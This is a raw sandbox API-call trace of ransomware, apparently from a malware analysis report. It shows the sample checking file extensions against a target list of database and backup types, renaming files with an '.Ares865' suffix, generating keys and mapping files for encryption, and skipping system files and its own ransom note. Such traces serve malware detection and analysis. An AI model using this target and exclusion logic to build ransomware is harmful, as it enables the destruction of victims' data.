[0082.387] lstrlenW (lpString="itw") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0082.387] lstrlenW (lpString="jet") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0082.387] lstrlenW (lpString="jtx") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0082.387] lstrlenW (lpString="kdb") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0082.387] lstrlenW (lpString="kexi") returned 4 [0082.387] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0082.387] lstrlenW (lpString="kexic") returned 5 [0082.387] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0082.387] lstrlenW (lpString="kexis") returned 5 [0082.387] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0082.387] lstrlenW (lpString="lgc") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0082.387] lstrlenW (lpString="lwx") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0082.388] lstrlenW (lpString="maf") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0082.388] lstrlenW (lpString="maq") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0082.388] lstrlenW (lpString="mar") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0082.388] lstrlenW (lpString="marshal") returned 7 [0082.388] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0082.388] lstrlenW (lpString="mas") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0082.388] lstrlenW (lpString="mav") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0082.388] lstrlenW (lpString="maw") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0082.388] lstrlenW (lpString="mdbhtml") returned 7 [0082.388] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0082.388] lstrlenW (lpString="mdn") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0082.388] lstrlenW (lpString="mdt") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0082.388] lstrlenW (lpString="mfd") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0082.388] lstrlenW (lpString="mpd") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0082.388] lstrlenW (lpString="mrg") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0082.388] lstrlenW (lpString="mud") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0082.388] lstrlenW (lpString="mwb") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0082.388] lstrlenW (lpString="myd") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0082.388] lstrlenW (lpString="ndf") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0082.388] lstrlenW (lpString="nnt") returned 3 [0082.388] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0082.388] lstrlenW (lpString="nrmlib") returned 6 [0082.388] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0082.388] lstrlenW (lpString="ns2") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0082.389] lstrlenW (lpString="ns3") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0082.389] lstrlenW (lpString="ns4") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0082.389] lstrlenW (lpString="nsf") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0082.389] lstrlenW (lpString="nv") returned 2 [0082.389] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0082.389] lstrlenW (lpString="nv2") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0082.389] lstrlenW (lpString="nwdb") returned 4 [0082.389] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0082.389] lstrlenW (lpString="nyf") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0082.389] lstrlenW (lpString="odb") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0082.389] lstrlenW (lpString="odb") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0082.389] lstrlenW (lpString="oqy") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0082.389] lstrlenW (lpString="ora") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0082.389] lstrlenW (lpString="orx") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0082.389] lstrlenW (lpString="owc") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0082.389] lstrlenW (lpString="p96") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0082.389] lstrlenW (lpString="p97") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0082.389] lstrlenW (lpString="pan") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0082.389] lstrlenW (lpString="pdb") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0082.389] lstrlenW (lpString="pdm") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0082.389] lstrlenW (lpString="pnz") returned 3 [0082.389] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0082.390] lstrlenW (lpString="qry") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0082.390] lstrlenW (lpString="qvd") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0082.390] lstrlenW (lpString="rbf") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0082.390] lstrlenW (lpString="rctd") returned 4 [0082.390] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0082.390] lstrlenW (lpString="rod") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0082.390] lstrlenW (lpString="rodx") returned 4 [0082.390] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0082.390] lstrlenW (lpString="rpd") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0082.390] lstrlenW (lpString="rsd") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0082.390] lstrlenW (lpString="sas7bdat") returned 8 [0082.390] lstrlenW (lpString="sbf") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0082.390] lstrlenW (lpString="scx") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0082.390] lstrlenW (lpString="sdb") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0082.390] lstrlenW (lpString="sdc") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0082.390] lstrlenW (lpString="sdf") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0082.390] lstrlenW (lpString="sis") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0082.390] lstrlenW (lpString="spq") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0082.390] lstrlenW (lpString="te") returned 2 [0082.390] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0082.390] lstrlenW (lpString="teacher") returned 7 [0082.390] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0082.390] lstrlenW (lpString="tmd") returned 3 [0082.390] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0082.391] lstrlenW (lpString="tps") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0082.391] lstrlenW (lpString="trc") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0082.391] lstrlenW (lpString="trc") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0082.391] lstrlenW (lpString="trm") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0082.391] lstrlenW (lpString="udb") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0082.391] lstrlenW (lpString="udl") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0082.391] lstrlenW (lpString="usr") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0082.391] lstrlenW (lpString="v12") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0082.391] lstrlenW (lpString="vis") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0082.391] lstrlenW (lpString="vpd") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0082.391] lstrlenW (lpString="vvv") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0082.391] lstrlenW (lpString="wdb") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0082.391] lstrlenW (lpString="wmdb") returned 4 [0082.391] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0082.391] lstrlenW (lpString="wrk") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0082.391] lstrlenW (lpString="xdb") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0082.391] lstrlenW (lpString="xld") returned 3 [0082.391] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0082.391] lstrlenW (lpString="xmlff") returned 5 [0082.391] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0082.391] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865") returned 134 [0082.391] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0082.392] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0082.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5800228) returned 1 [0082.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0082.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0082.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0082.393] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0082.394] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0082.394] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.394] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x588430, lpName=0x0) returned 0x15c [0082.396] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x188430) returned 0x3030000 [0082.787] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0082.788] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0082.788] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0082.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0082.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0082.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0082.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0082.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0082.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0082.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0082.789] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0082.803] CloseHandle (hObject=0x15c) returned 1 [0082.803] CloseHandle (hObject=0x118) returned 1 [0082.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0082.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0082.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0082.812] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2576a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0082.812] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0082.812] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4374a500, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x4374a500, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x4374a500, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="aoldtz.exe") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="..") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="windows") returned -1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="bootmgr") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="temp") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="pagefile.sys") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="boot") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ids.txt") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="ntuser.dat") returned 1 [0082.812] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="perflogs") returned 1 [0082.813] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="MSBuild") returned 1 [0082.813] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0082.813] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0082.813] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="vc_runtimeAdditional_x64.msi") returned="vc_runtimeAdditional_x64.msi" [0082.813] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0082.813] lstrlenW (lpString="Ares865") returned 7 [0082.813] lstrcmpiW (lpString1="x64.msi", lpString2="Ares865") returned 1 [0082.813] lstrlenW (lpString=".dll") returned 4 [0082.813] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".dll") returned 1 [0082.813] lstrlenW (lpString=".lnk") returned 4 [0082.813] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".lnk") returned 1 [0082.813] lstrlenW (lpString=".ini") returned 4 [0082.813] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".ini") returned 1 [0082.813] lstrlenW (lpString=".sys") returned 4 [0082.813] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2=".sys") returned 1 [0082.813] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0082.813] lstrlenW (lpString="bak") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0082.813] lstrlenW (lpString="ba_") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0082.813] lstrlenW (lpString="dbb") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0082.813] lstrlenW (lpString="vmdk") returned 4 [0082.813] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0082.813] lstrlenW (lpString="rar") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0082.813] lstrlenW (lpString="zip") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0082.813] lstrlenW (lpString="tgz") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0082.813] lstrlenW (lpString="vbox") returned 4 [0082.813] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0082.813] lstrlenW (lpString="vdi") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0082.813] lstrlenW (lpString="vhd") returned 3 [0082.813] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0082.813] lstrlenW (lpString="vhdx") returned 4 [0082.813] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0082.814] lstrlenW (lpString="avhd") returned 4 [0082.814] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0082.814] lstrlenW (lpString="db") returned 2 [0082.814] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0082.814] lstrlenW (lpString="db2") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0082.814] lstrlenW (lpString="db3") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0082.814] lstrlenW (lpString="dbf") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0082.814] lstrlenW (lpString="mdf") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0082.814] lstrlenW (lpString="mdb") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0082.814] lstrlenW (lpString="sql") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0082.814] lstrlenW (lpString="sqlite") returned 6 [0082.814] lstrcmpiW (lpString1="64.msi", lpString2="sqlite") returned -1 [0082.814] lstrlenW (lpString="sqlite3") returned 7 [0082.814] lstrcmpiW (lpString1="x64.msi", lpString2="sqlite3") returned 1 [0082.814] lstrlenW (lpString="sqlitedb") returned 8 [0082.814] lstrcmpiW (lpString1="_x64.msi", lpString2="sqlitedb") returned -1 [0082.814] lstrlenW (lpString="xml") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0082.814] lstrlenW (lpString="$er") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0082.814] lstrlenW (lpString="4dd") returned 3 [0082.814] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0082.815] lstrlenW (lpString="4dl") returned 3 [0082.815] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0082.815] lstrlenW (lpString="^^^") returned 3 [0082.815] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0082.815] lstrlenW (lpString="abs") returned 3 [0082.815] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0082.815] lstrlenW (lpString="abx") returned 3 [0082.815] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0082.815] lstrlenW (lpString="accdb") returned 5 [0082.815] lstrcmpiW (lpString1="4.msi", lpString2="accdb") returned -1 [0082.815] lstrlenW (lpString="accdc") returned 5 [0082.815] lstrcmpiW (lpString1="4.msi", lpString2="accdc") returned -1 [0082.815] lstrlenW (lpString="accde") returned 5 [0082.815] lstrcmpiW (lpString1="4.msi", lpString2="accde") returned -1 [0082.815] lstrlenW (lpString="accdr") returned 5 [0082.815] lstrcmpiW (lpString1="4.msi", lpString2="accdr") returned -1 [0082.815] lstrlenW (lpString="accdt") returned 5 [0082.815] lstrcmpiW (lpString1="4.msi", lpString2="accdt") returned -1 [0082.815] lstrlenW (lpString="accdw") returned 5 [0082.815] lstrcmpiW (lpString1="4.msi", lpString2="accdw") returned -1 [0082.815] lstrlenW (lpString="accft") returned 5 [0082.816] lstrcmpiW (lpString1="4.msi", lpString2="accft") returned -1 [0082.816] lstrlenW (lpString="adb") returned 3 [0082.816] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0082.817] lstrlenW (lpString="adb") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0082.817] lstrlenW (lpString="ade") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0082.817] lstrlenW (lpString="adf") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0082.817] lstrlenW (lpString="adn") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0082.817] lstrlenW (lpString="adp") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0082.817] lstrlenW (lpString="alf") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0082.817] lstrlenW (lpString="ask") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0082.817] lstrlenW (lpString="btr") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0082.817] lstrlenW (lpString="cat") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0082.817] lstrlenW (lpString="cdb") returned 3 [0082.817] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0082.817] lstrlenW (lpString="ckp") returned 3 [0082.818] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0082.819] lstrlenW (lpString="cma") returned 3 [0082.819] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0082.819] lstrlenW (lpString="cpd") returned 3 [0082.819] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0082.819] lstrlenW (lpString="dacpac") returned 6 [0082.819] lstrcmpiW (lpString1="64.msi", lpString2="dacpac") returned -1 [0082.819] lstrlenW (lpString="dad") returned 3 [0082.820] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0082.820] lstrlenW (lpString="dadiagrams") returned 10 [0082.820] lstrcmpiW (lpString1="al_x64.msi", lpString2="dadiagrams") returned -1 [0082.820] lstrlenW (lpString="daschema") returned 8 [0082.820] lstrcmpiW (lpString1="_x64.msi", lpString2="daschema") returned -1 [0082.820] lstrlenW (lpString="db-journal") returned 10 [0082.820] lstrcmpiW (lpString1="al_x64.msi", lpString2="db-journal") returned -1 [0082.820] lstrlenW (lpString="db-shm") returned 6 [0082.820] lstrcmpiW (lpString1="64.msi", lpString2="db-shm") returned -1 [0082.820] lstrlenW (lpString="db-wal") returned 6 [0082.820] lstrcmpiW (lpString1="64.msi", lpString2="db-wal") returned -1 [0082.820] lstrlenW (lpString="dbc") returned 3 [0082.820] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0082.820] lstrlenW (lpString="dbs") returned 3 [0082.820] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0082.820] lstrlenW (lpString="dbt") returned 3 [0082.821] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0082.822] lstrlenW (lpString="dbv") returned 3 [0082.823] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0082.823] lstrlenW (lpString="dbx") returned 3 [0082.823] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0082.823] lstrlenW (lpString="dcb") returned 3 [0082.823] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0082.823] lstrlenW (lpString="dct") returned 3 [0082.823] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0082.823] lstrlenW (lpString="dcx") returned 3 [0082.823] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0082.823] lstrlenW (lpString="ddl") returned 3 [0082.823] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0082.823] lstrlenW (lpString="dlis") returned 4 [0082.823] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0082.824] lstrlenW (lpString="dp1") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0082.824] lstrlenW (lpString="dqy") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0082.824] lstrlenW (lpString="dsk") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0082.824] lstrlenW (lpString="dsn") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0082.824] lstrlenW (lpString="dtsx") returned 4 [0082.824] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0082.824] lstrlenW (lpString="dxl") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0082.824] lstrlenW (lpString="eco") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0082.824] lstrlenW (lpString="ecx") returned 3 [0082.824] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0082.824] lstrlenW (lpString="edb") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0082.825] lstrlenW (lpString="epim") returned 4 [0082.825] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0082.825] lstrlenW (lpString="fcd") returned 3 [0082.825] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0082.825] lstrlenW (lpString="fdb") returned 3 